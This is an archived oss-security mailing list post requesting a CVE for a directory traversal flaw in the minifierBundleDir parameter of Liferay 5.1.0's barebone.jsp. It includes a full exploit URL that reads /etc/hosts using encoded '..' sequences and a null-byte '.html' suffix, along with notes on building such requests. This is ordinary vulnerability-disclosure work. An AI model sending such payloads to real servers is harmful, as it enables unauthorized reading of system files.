Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 1 Aug 2016 18:38:09 +0200
From: "petrella.pietro" <petrella.pietro@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE:Request - Path Traversal Barebone.jsp - Liferay
 5.1.0


I discovered a /directory traversal issue /on *minifierBundleDir 
*/barebone.jsp /_variable___on a website with *Liferay 5.1.0*. I don't 
exclude that this vulnerability is present in other Liferay versions as 
well.

However, i report the following vulnerable URL of example:

https://mysite.it/html/js/barebone.jsp?browserId=firefox&themeId=sometheme&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&*minifierBundleDir**=**/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html*&t=1429132297000

It's important to note that the url requested is built in the following 
manner:
- only .. "encoded characters" are permitted when you insert the 
traversal request
- At the end of the file is necessary insert *%00* and *.html* otherwise 
the request is not accepted

So, to navigate filesystem is recommended to use Burp Suite "repeater 
tab" tool.

If there are no CVE about this finding, at this pourpose i require a CVE 
please.

Thank you
Pietro

-- -- -- -- --
Pietro Petrella
Information Security Consultant
(CISSP, OPST, RHCE, ISO 27001:2013)
PGP: 5017 E6A8 9E1E 5B39 8C52 05C7 81A5 C3C9 8ED5 4730


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ